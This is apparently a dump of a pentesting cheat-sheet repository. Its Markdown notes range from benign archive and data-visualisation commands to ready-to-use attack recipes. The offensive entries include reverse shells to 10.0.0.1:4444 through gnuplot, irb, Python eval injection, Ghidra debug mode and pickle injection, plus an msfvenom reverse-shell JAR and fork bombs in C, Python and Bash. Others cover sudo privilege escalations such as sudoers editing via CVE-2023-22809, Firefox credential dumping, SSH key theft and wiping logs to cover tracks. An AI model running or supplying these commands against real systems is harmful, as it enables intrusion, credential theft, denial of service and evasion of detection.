21 | 22 | ## Decompress 23 | 24 | ```sh 25 | # e: Extract files from archive 26 | 7z e example.zip 27 | # With password 28 | 7z e example.zip -p password 29 | ``` 30 | -------------------------------------------------------------------------------- /src/exploit/linux/archive/_data.yml: -------------------------------------------------------------------------------- 1 | category2: archive -------------------------------------------------------------------------------- /src/exploit/linux/archive/bzip-bunzip.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Bzip2 & Bunzip2 3 | description: Bzip2 command is a compression utility in Unix, Linux and other operating systems. It is used to compress and decompress files to reduce their size. 4 | tags: 5 | - Archive 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Compress 12 | 13 | ```sh 14 | bzip2 example.txt 15 | ``` 16 | 17 |
18 | 19 | ## Decompress 20 | 21 | ```sh 22 | bzip2 -d example.txt.bz2 23 | bunzip2 example.txt.bz2 24 | ``` 25 | -------------------------------------------------------------------------------- /src/exploit/linux/archive/crack-7z-password.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Crack 7z Password 3 | description: If a 7z file is protected with password, we can crack the password. 4 | tags: 5 | - Archive 6 | refs: 7 | date: 2024-12-18 8 | draft: false 9 | --- 10 | 11 | ## Crack 12 | 13 | ### 1. Convert to Hash 14 | 15 | First we need to convert the `.7z` file to hash. 16 | 17 | ```sh 18 | 7z2john example.7z > hash.txt 19 | # or 20 | /usr/share/john/7z2john.pl example.7z > hash.txt 21 | ``` 22 | 23 | If we got the error “`Can't locate Compress/Raw/Lzma.pm in @INC`...”, we need to install `libcompress-raw-lzma-perl` package so try: 24 | 25 | ```bash 26 | sudo apt install libcompress-raw-lzma-perl 27 | ``` 28 | 29 | ### 2. Crack the Hash 30 | 31 | Now we can crack the hash with one of the commands below: 32 | 33 | ```sh 34 | john --wordlist=wordlist.txt hash.txt 35 | # or 36 | hashcat -m 11600 hash.txt wordlist.txt 37 | ``` 38 | -------------------------------------------------------------------------------- /src/exploit/linux/archive/gzip-gunzip.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Gzip & Gunzip 3 | description: Gzip command is a utility that is used to compress and decompress files to reduce their size. The name "gzip" stands for "GNU zip". 4 | tags: 5 | - Archive 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Compress 12 | 13 | ```sh 14 | gzip example.txt 15 | ``` 16 | 17 |
18 | 19 | ## Decompress 20 | 21 | ```sh 22 | gzip -d example.txt.gz 23 | gunzip example.txt.gz 24 | ``` 25 | -------------------------------------------------------------------------------- /src/exploit/linux/archive/tar.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Tar 3 | description: Tar command is a utility that is used to create, manipulate, and extract archived files. "tar" stands for "tape archive". 4 | tags: 5 | - Archive 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Archive Files 12 | 13 | ```sh 14 | # -c: Create a new archive 15 | # -f: Use archive file 16 | tar -cf archive.tar example.txt 17 | tar -cf archive.tar example1.txt example2.txt 18 | # -z: filter the archive through gzip 19 | tar -zcf example.tar.gz example/ 20 | ``` 21 | 22 |
23 | 24 | ## Extract Files 25 | 26 | ```sh 27 | # -x: Extract files from an archive 28 | # -f: Use archive file 29 | tar -xf archive.tar 30 | tar -xf archive.tar.gz 31 | # output given directory 32 | tar -xf archive.tar --directory archived 33 | ``` 34 | 35 |
36 | 37 | ## Display Contents without Extracting 38 | 39 | ```sh 40 | tar -tf archive.tar 41 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/attack/_data.yml: -------------------------------------------------------------------------------- 1 | category2: attack -------------------------------------------------------------------------------- /src/exploit/linux/attack/fork-bomb.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Fork Bomb 3 | description: Fork Bomb is one of the denial-of-service attacks which lead the system to deplete the available resources by replicating a child process infinitely. 4 | tags: 5 | - Linux 6 | refs: 7 | - https://www.geeksforgeeks.org/zombie-processes-prevention/?ref=ml_lbp 8 | - https://www.imperva.com/learn/ddos/fork-bomb/ 9 | date: 2023-07-24 10 | draft: false 11 | --- 12 | 13 | ### Warning 14 | 15 | **Please don’t execute the following programs in system that you don’t want to harm.** 16 | 17 | ## Exploitation in C 18 | 19 | This program forks child processes continuously. 20 | 21 | ```c 22 | #include 23 | #include 24 | 25 | int main() 26 | { 27 | while (1) 28 | // Create a child process from the parent process. 29 | fork(); 30 | return 0; 31 | } 32 | ``` 33 | 34 | ## Exploitation in Python 35 | 36 | ```python 37 | import os 38 | 39 | while True: 40 | os.fork() 41 | ``` 42 | 43 | ## Exploitation in Bash 44 | 45 | ```bash 46 | :(){ :|: & };: 47 | ``` 48 | -------------------------------------------------------------------------------- /src/exploit/linux/backup/_data.yml: -------------------------------------------------------------------------------- 1 | category2: backup -------------------------------------------------------------------------------- /src/exploit/linux/backup/borgbackup-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: BorgBackup Pentesting 3 | description: A deduplicating backup program. 4 | tags: 5 | - Backup 6 | - Linux 7 | refs: 8 | date: 2023-04-10 9 | draft: false 10 | --- 11 | 12 | ## Extract Archives 13 | 14 | ```sh 15 | borg extract /path/to/archive:: 16 | Enter passphrase: 17 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/container/_data.yml: -------------------------------------------------------------------------------- 1 | category2: container -------------------------------------------------------------------------------- /src/exploit/linux/management/_data.yml: -------------------------------------------------------------------------------- 1 | category2: management -------------------------------------------------------------------------------- /src/exploit/linux/post-exploitation/_data.yml: -------------------------------------------------------------------------------- 1 | category2: post-exploitation -------------------------------------------------------------------------------- /src/exploit/linux/post-exploitation/cover-your-tracks-in-linux.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Cover Your Tracks in Linux 3 | description: After exploitation in Linux system, attackers want to erase their activities and be undetectable. 4 | tags: 5 | - Post Exploitation 6 | refs: 7 | - https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover-your-tracks-remain-undetected-0244768/ 8 | - https://www.poplabsec.com/how-to-cover-your-tracks-on-linux/ 9 | date: 2023-11-15 10 | draft: false 11 | --- 12 | 13 | ## Clear History 14 | 15 | ```bash 16 | unset HISTORY 17 | echo '' > ~/.bash_history 18 | echo '' > /root/.bash_history 19 | history -c 20 | export HISTSIZE=0 21 | unset HISTFILE 22 | ``` 23 | 24 |
25 | 26 | ## Clear Logs 27 | 28 | ```bash 29 | # Shrink the size of log files with `truncate -s 0` 30 | truncate -s 0 /var/log/auth.log 31 | echo '' > /var/log/auth.log 32 | cat /dev/null > /var/log/auth.log 33 | > /var/log/auth.log 34 | dd if=/dev/null of=/var/log/auth.log 35 | shred /var/log/auth.log 36 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/_data.yml: -------------------------------------------------------------------------------- 1 | category2: privilege-escalation -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/doas/_data.yml: -------------------------------------------------------------------------------- 1 | category3: doas -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/doas/index.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Doas Privilege Escalation 3 | description: doas executes arbitrary commands as another user. It's similar to sudo command. doas.conf is interesting to privilege escalation. 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | refs: 8 | date: 2023-03-07 9 | draft: false 10 | --- 11 | 12 | ## Investigation 13 | 14 | First of all, search location of doas.conf. 15 | 16 | ```sh 17 | find / -type f -name "doas.conf" 2>/dev/null 18 | ``` 19 | 20 | Next check the configuration. 21 | 22 | ```sh 23 | doas -C /path/to/doas.conf 24 | doas -C /etc/doas.conf 25 | # or 26 | cat /etc/doas.conf 27 | ``` 28 | 29 | Execute doas as below. 30 | 31 | ```sh 32 | doas -u root 33 | ``` 34 | 35 | Please also refer to [GTFOBins](https://gtfobins.github.io/) to PrivEsc. -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/firefox-credentials-dumping.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: FireFox Credentials Dumping 3 | description: A .mofilla directory contains a firefox directory that stores credentials. We may dump the credentials and escalate privilege using them. 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2024-10-03 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | If there is a `.mozilla/firefox` directory in some user's home directory, we can dump credentials. So check this directory: 14 | 15 | ```sh 16 | ls -al /home//.mozilla/ 17 | ``` 18 | 19 |
20 | 21 | ## Dump Passwords from Firefox Profile 22 | 23 | To crack it, use [firefox_decrypt](https://github.com/unode/firefox_decrypt): 24 | 25 | ```sh 26 | python3 firefox_decrypt.py .mozilla/firefox/ 27 | ``` 28 | 29 | If we’ll be asked the master password and we don’t know it, try common passwords. 30 | 31 | ```txt 32 | admin 33 | password 34 | password1 35 | password123 36 | root 37 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/ghidra-debug-mode-rce.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Ghidra Debug Mode RCE 3 | description: 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | refs: 8 | - https://www.youtube.com/watch?v=N3VcWIUpgfE 9 | - https://github.com/NationalSecurityAgency/ghidra/issues/6 10 | date: 2023-03-31 11 | draft: false 12 | --- 13 | 14 | ## Exploitation 15 | 16 | ```bash 17 | jdb -attach 127.0.0.1:18001 18 | > classpath 19 | > classes 20 | Log4j2-TF-4-Scheduled-1[1] stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run() 21 | Log4j2-TF-4-Scheduled-1[1] print new java.lang.Runtime().exec("nc 10.0.0.1 4444 -e /bin/sh") 22 | ``` 23 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/gnuplot-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Gnuplot Privilege Escalation 3 | description: gnuplot is a command-line and GUI program that can generate two- and three-dimentional plots of functions, data, and data fits. 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | refs: 8 | - http://gnuplot.info/docs_5.5/loc18483.html 9 | date: 2023-06-19 10 | draft: false 11 | --- 12 | 13 | ## Command Execution 14 | 15 | The script file of **`gnuplot`** can be used to execute system commands as below. 16 | 17 | ```bash 18 | gnuplot test.plt 19 | ``` 20 | 21 | Contents of the **`.plt`** is like the following. 22 | 23 | ```bash 24 | system "whoami" 25 | 26 | # Reverse shell 27 | system "bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" 28 | ``` 29 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/irb-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: irb (Interactive Ruby Shell) Privilege Escalation 3 | description: 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Exploitation 12 | 13 | ```bash 14 | irb 15 | 16 | # #q!: Define a string literal 17 | > exec %q!whoami! 18 | > exec %q!cp /bin/bash /tmp/bash; chmod +s /tmp/bash! 19 | > exec %q!bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"! 20 | ``` 21 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/python-eval-code-execution.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Python Eval Code Execution 3 | description: Python's eval() method is vulnerable to arbitrary code execution. 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | - Web 8 | refs: 9 | date: 2023-04-11 10 | draft: false 11 | --- 12 | 13 | ## Investigation 14 | 15 | ```py 16 | eval(text) 17 | eval(f"5 + {num}") 18 | ``` 19 | 20 | If the Python script allows us to input some value to the **"text"** variable, we can inject arbitrary code. 21 | 22 |
23 | 24 | ## Arbitrary Code Execution 25 | 26 | Most of the time, we need to bypass another expression to execute our desired command. 27 | 28 | ```html 29 | __import__('os').system('id') 30 | 31 | 32 | ),__import__('os').system('id') 33 | '),__import__('os').system('id') 34 | },__import__('os').system('id') 35 | ),__import__('os').system('id')# 36 | ``` 37 | 38 | ### Reverse Shell 39 | 40 | ```html 41 | __import__('os').system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"') 42 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/rust-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Rust Privilege Escalation 3 | description: Rust is a multi-paradigm, general-purpose programming language that emphasizes performance, type safety, and concurrency. If we have a write permission of a Rust file, we may be able to inject arbitrary code to escalate privileges. 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | refs: 8 | - https://book.hacktricks.xyz/linux-hardening/privilege-escalation 9 | date: 2023-06-27 10 | draft: false 11 | --- 12 | 13 | ## Reverse Shell 14 | 15 | Reference: https://github.com/LukeDSchenk/rust-backdoors/blob/master/reverse-shell/src/main.rs 16 | 17 | We can create a binary or module to reverse shell. 18 | 19 | ```bash 20 | cd /path/to/rust/project/src 21 | vim lib.rs 22 | (In vim editor, insert a reverse shell code into a file) 23 | cargo build 24 | ``` 25 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/snapd-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Snapd Privilege Escalation 3 | description: Snapd might be vulnerable to privilege escalation. 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | refs: 8 | date: 2023-02-05 9 | draft: false 10 | --- 11 | 12 | 13 | ## dirty_sock (CVE-2019-7304) Version < 2.37 14 | 15 | Reference: [https://www.exploit-db.com/exploits/46361](https://www.exploit-db.com/exploits/46361) 16 | 17 | 18 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sssd-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: SSSD Privilege Escalation 3 | description: SSSD (System Security Services Daemon) provides a set of daemons to manage access to remote directory services and authentication mechanisms. 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | refs: 8 | date: 2023-04-16 9 | draft: false 10 | --- 11 | 12 | ## Find Credentials 13 | 14 | ```bash 15 | ls -la /var/lib/sss/ 16 | 17 | # Find credentials 18 | # If we find the hash, crack it using John or Hashcat. 19 | strings /var/lib/sss/db/example.ldb 20 | ``` 21 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/_data.yml: -------------------------------------------------------------------------------- 1 | category3: sudo -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-client-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Fail2ban-Client Privilege Escalation 3 | description: Sudo fail2ban-client command might be vulnerable to privilege escalation (PrivEsc). 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2025-03-12 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```bash 14 | sudo -l 15 | 16 | # Output: 17 | (ALL) NOPASSWD: /usr/bin/fail2ban-client 18 | ``` 19 | 20 | If we can execute `fail2ban-client` command as root, we may be able to escalate privilege and gain a root shell. 21 | 22 | ## Exploit 23 | 24 | ```bash 25 | # Get jail list 26 | sudo /usr/bin/fail2ban-client status 27 | # Choose one of the jails from the "Jail list" in the output. 28 | sudo /usr/bin/fail2ban-client get actions 29 | # Create a new action with arbitrary name (e.g. "evil") 30 | sudo /usr/bin/fail2ban-client set addaction evil 31 | # Set payload to actionban 32 | sudo /usr/bin/fail2ban-client set action evil actionban "chmod +s /bin/bash" 33 | # Trigger the action 34 | sudo /usr/bin/fail2ban-client set banip 1.2.3.5 35 | # Now we gain a root 36 | /bin/bash -p 37 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-java-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Java Privilege Escalation 3 | description: Sudo Java is vulnerable to privilege escalation. 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-02-14 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```bash 14 | sudo -l 15 | 16 | (root) /usr/bin/java -jar *.jar 17 | ``` 18 | 19 | If we can execute java command with arbitrary **`.jar`** file as root, we can escalate to privileges. 20 | 21 |
22 | 23 | ## Exploitation 24 | 25 | ### 1. Create a JAR File 26 | 27 | First, create a custom jar file in local machine. 28 | Replace **``** with your local ip address. 29 | 30 | ```bash 31 | msfvenom -p java/shell_reverse_tcp LHOST= LPORT=4444 -f jar -o shell.jar 32 | ``` 33 | 34 | Then transfer the file to remote machine. 35 | 36 | ### 2. Reverse Shell 37 | 38 | In local machine, start a listener. 39 | 40 | ```bash 41 | nc -lvnp 4444 42 | ``` 43 | 44 | Now execute the java command as root in target machine. 45 | 46 | ```bash 47 | sudo /usr/bin/java -jar /tmp/shell.jar 48 | ``` 49 | 50 | We should get a root shell. -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-path-traversal-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Path Traversal Privilege Escalation 3 | description: If some sudo command receives a file path, we might escalate to privileges using path traversal. 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-02-05 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```sh 14 | sudo -l 15 | 16 | (ALL) /usr/bin/node /usr/local/scripts/*.js 17 | ``` 18 | 19 | If the file path uses wildcards, we may execute arbitrary files. 20 | In short, we can refer to files in different directories which the system owner unintended. 21 | 22 |
23 | 24 | ## Exploitation 25 | 26 | Assume we can execute ‘node’ command as root and js file. 27 | Create the **“test.js”** under **/tmp**, which spawns a root shell after executing **‘node’** command. 28 | 29 | ```jsx 30 | // /tmp/test.js 31 | require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]}) 32 | ``` 33 | 34 | Now run **‘node’** command as root. We can pass the file using path traversal. 35 | 36 | ```jsx 37 | sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.js 38 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-screen-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Screen Privilege Escalation 3 | description: Sudo screen command might be vulnerable to privilege escalation (PrivEsc). 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-02-05 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```sh 14 | sudo -l 15 | 16 | (root) /usr/bin/screen -r testsession 17 | ``` 18 | 19 | If we can execute **"screen"** command as root, we can spawn a root shell from the screen session. 20 | 21 |
22 | 23 | ## Exploitation 24 | 25 | First execute **"screen"** command as root, then a screen session will be start. 26 | Now we can spawn a root shell by pressing **“Ctrl+a+c”** in the screen session. 27 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-shutdown-poweroff-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Shutdown, Poweroff Privilege Escalation 3 | description: Sudo shutdown command might be vulnerable to privilege escalation (PrivEsc). 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-02-05 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```sh 14 | sudo -l 15 | 16 | (ALL) NOPASS: /usr/sbin/shutdown 17 | ``` 18 | 19 | If we can execute **"shutdown"** command as root, we can gain access to privileges by overwriting the path of **"poweroff"**. 20 | 21 |
22 | 23 | ## Exploitation 24 | 25 | First create **/tmp/poweroff** binary which invoke a shell. 26 | 27 | ```sh 28 | echo /bin/sh > /tmp/poweroff 29 | # or 30 | echo /bin/bash > /tmp/poweroff 31 | ``` 32 | 33 | Then change permissions of the file and add **"/tmp"** folder to **PATH**. 34 | 35 | ```sh 36 | chmod +x /tmp/poweroff 37 | export PATH=/tmp:$PATH 38 | ``` 39 | 40 | Now execute **"shutdown"** as root. 41 | 42 | ```sh 43 | # Some SUID command 44 | sudo /usr/sbin/shutdown 45 | 46 | # Then you are root user 47 | root> 48 | ``` 49 | 50 | **/tmp/poweroff** is executed and spawn a root shell. 51 | 52 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-umount-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Umount Privilege Escalation 3 | description: Sudo umount is vulnerable to privilege escalation. 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-02-15 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```bash 14 | sudo -l 15 | 16 | (root) NOPASSWD: /bin/umount 17 | ``` 18 | 19 | If we can execute umount command as root, we can escalate to privilege. 20 | 21 |
22 | 23 | ## Exploitation 24 | 25 | In target machine, check what directory is mounted. 26 | 27 | ```bash 28 | cat /etc/fstab 29 | showmount -e localhost 30 | ``` 31 | 32 | Assume the **`/opt/example`** folder is mounted. 33 | If we unmount this folder, original files, that existed before the directory is mounted, may appear. 34 | 35 | ```bash 36 | sudo /bin/umount /opt/example 37 | ls -al /opt/example 38 | ``` 39 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-wall-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Wall Privilege Escalation 3 | description: Wall command can display the result of OS command. Executing as root might be vulnerable to privilege escalation (PrivEsc). 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-02-05 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```sh 14 | sudo -l 15 | 16 | (ALL) NOPASSWD: wall 17 | ``` 18 | 19 |
20 | 21 | ## Exploitation 22 | 23 | ```sh 24 | # Reverse shell 25 | sudo wall "$(bash -c 'bash -i >& /dev/tcp// 0>&1')" 26 | 27 | # Gets a SSH private key of another user 28 | sudo wall "$(cat /home/user/.ssh/id_rsa)" 29 | ``` 30 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudoedit-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudoedit Privilege Escalation 3 | description: Sudoedit is vulnerable to privilege escalation. 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | - https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf 8 | date: 2023-03-29 9 | draft: false 10 | --- 11 | 12 | ## Investigation 13 | 14 | ```bash 15 | sudo -l 16 | 17 | (root) sudoedit /opt/example.txt 18 | ``` 19 | 20 | If we can execute sudoedit command as root, we might be able to escalate the privileges with some version. 21 | 22 |
23 | 24 | ## Exploitation ([CVE-2023-22809](https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf)) 25 | 26 | ```bash 27 | export EDITOR="vim -- /etc/sudoers" 28 | sudoedit /opt/example.txt 29 | ``` 30 | 31 | In vim editor, add the following line in **`/etc/sudoers`**. 32 | Assume the current username is “john” 33 | 34 | ```bash 35 | john ALL=(ALL:ALL) ALL 36 | ``` 37 | 38 | After that, we can escalate to root privilege. 39 | 40 | ```bash 41 | sudo su root 42 | ``` 43 | -------------------------------------------------------------------------------- /src/exploit/linux/protocol/_data.yml: -------------------------------------------------------------------------------- 1 | category2: protocol -------------------------------------------------------------------------------- /src/exploit/linux/protocol/x11-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: X11 (X Window System) Pentesting 3 | description: The X Window System is a windowing system for bitmap displays, common on Unix-like operating systems. Default ports are 6000, 6001. 4 | tags: 5 | - Linux 6 | refs: 7 | date: 2023-02-05 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```bash 14 | nmap --script x11-access -p 6000 15 | 16 | msf> use auxiliary/scanner/x11/open_x11 17 | ``` 18 | -------------------------------------------------------------------------------- /src/exploit/machine-learning/_data.yml: -------------------------------------------------------------------------------- 1 | category1: machine-learning 2 | related_menus: 3 | - title: Data Processing 4 | id: data-processing 5 | - title: Computer Vision 6 | id: computer-vision 7 | - title: LLM 8 | id: llm 9 | - title: Model 10 | id: model 11 | - title: Others 12 | id: others -------------------------------------------------------------------------------- /src/exploit/machine-learning/computer-vision/Image-Recognition-Bypass-for-Machine-Learning.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Image Recognition Bypass for Machine Learning 3 | description: We can trick image recognizer or classifier by adding filters or obfuscating an image. 4 | tags: 5 | - Computer Vision 6 | - Machine Learning 7 | refs: 8 | date: 2023-08-18 9 | draft: false 10 | --- 11 | 12 | The following techniques include those that are ineffective currently or in the future.. 13 | 14 | ## Blurring 15 | 16 | ```python 17 | from PIL import Image 18 | from PIL import ImageFilter 19 | 20 | img = Image.open("example.png") 21 | 22 | # Box blur 23 | img1 = img.filter(ImageFilter.BoxBlur(5)) 24 | # Gaussian blur 25 | img2 = img.filter(ImageFilter.GaussianBlur(5)) 26 | # Median filter 27 | img3 = img.filter(ImageFilter.MedianFilter(size=5)) 28 | # Rank filter 29 | img4 = img.filter(ImageFilter.RankFilter(size=13, rank=5)) 30 | ``` 31 | 32 |
33 | 34 | ## Cropping/Rotating 35 | 36 | ```python 37 | from PIL import Image 38 | from PIL import ImageFilter 39 | 40 | img = Image.open("example.png") 41 | img = img.resize((512, 512)) 42 | 43 | img1 = img.crop((0, 0, 300, 280)).rotate(-60) 44 | ``` 45 | -------------------------------------------------------------------------------- /src/exploit/machine-learning/computer-vision/_data.yml: -------------------------------------------------------------------------------- 1 | category2: computer-vision -------------------------------------------------------------------------------- /src/exploit/machine-learning/data-processing/_data.yml: -------------------------------------------------------------------------------- 1 | category2: data-processing -------------------------------------------------------------------------------- /src/exploit/machine-learning/data-processing/data-visualization-for-machine-learning.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Data Visualization for Machine Learning 3 | description: 4 | tags: 5 | - Machine Learning 6 | refs: 7 | date: 2024-06-19 8 | draft: false 9 | --- 10 | 11 | ## Simple Example 12 | 13 | ```py 14 | import pandas as pd 15 | import matplotlib.pyplot as plt 16 | 17 | df = pd.read_csv('example.csv', index_col=0) 18 | 19 | plt.figure(figsize=(5, 6)) 20 | 21 | # Choose a graph type 22 | plt.bar(df['Name'], df['Age'], color='red') 23 | # or 24 | plt.scatter(df['Name'], df['Age'], alpha=0.5) 25 | 26 | # Set title and labels 27 | plt.title("Example Title") 28 | plt.xlabel("Name") 29 | plt.ylabel("Age") 30 | 31 | # Display 32 | plt.show() 33 | ``` -------------------------------------------------------------------------------- /src/exploit/machine-learning/data-processing/dimensionality-reduction-for-machine-learning.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Dimensionality Reduction for Machine Learning 3 | description: Dimensionality Reduction is a data processing to make machine learning models easier to train. 4 | tags: 5 | - Data Processing 6 | - Machine Learning 7 | refs: 8 | - https://www.kaggle.com/competitions/ai-village-ctf 9 | date: 2023-08-20 10 | draft: false 11 | --- 12 | 13 | ## PCA (Principal Component Analysis) 14 | 15 | Reference: [https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=42](https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=42) 16 | 17 | we use **PCA** to find the optimal dimensions for data. 18 | 19 | ```python 20 | import numpy as np 21 | from sklearn.decomposition import PCA 22 | 23 | data = np.load("example.npy") 24 | 25 | for i in range(1, 10): 26 | pca = PCA(n_components=i) 27 | principal_components = pca.fit_transform(data) 28 | print(pca.explained_variance_ratio_) 29 | ``` 30 | -------------------------------------------------------------------------------- /src/exploit/machine-learning/llm/_data.yml: -------------------------------------------------------------------------------- 1 | category2: llm -------------------------------------------------------------------------------- /src/exploit/machine-learning/model/_data.yml: -------------------------------------------------------------------------------- 1 | category2: model -------------------------------------------------------------------------------- /src/exploit/machine-learning/model/pickle-code-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Pickle Code Injection 3 | description: 4 | tags: 5 | - Machine Learning 6 | refs: 7 | - https://github.com/trailofbits/fickling 8 | - https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/ 9 | - https://thehackernews.com/2024/06/new-attack-technique-sleepy-pickle.html 10 | date: 2024-07-17 11 | draft: false 12 | --- 13 | 14 | ## Exploit 15 | 16 | ```bash 17 | fickling --inject "import os; os.system('/bin/bash')" example.pkl 18 | 19 | # Reverse shell (replace "10.0.0.1" and 4444 with your own) 20 | fickling --inject 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' example.pkl 21 | ``` 22 | -------------------------------------------------------------------------------- /src/exploit/machine-learning/orange-data-mining.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Orange Data Mining 3 | description: Orange is a data-mining and machine learning software that allows users to analyze data, create visualizations, and build predictive models. 4 | tags: 5 | - Machine Learning 6 | refs: 7 | - https://orange3.readthedocs.io/projects/orange-visual-programming/en/latest/index.html 8 | date: 2023-03-20 9 | draft: false 10 | --- 11 | 12 | ## Installation & Start 13 | 14 | To install Orange, we can install it with pip in Linux. 15 | 16 | ```bash 17 | pip install PyQt5 PyQtWebEngine 18 | pip install orange3 19 | ``` 20 | 21 |
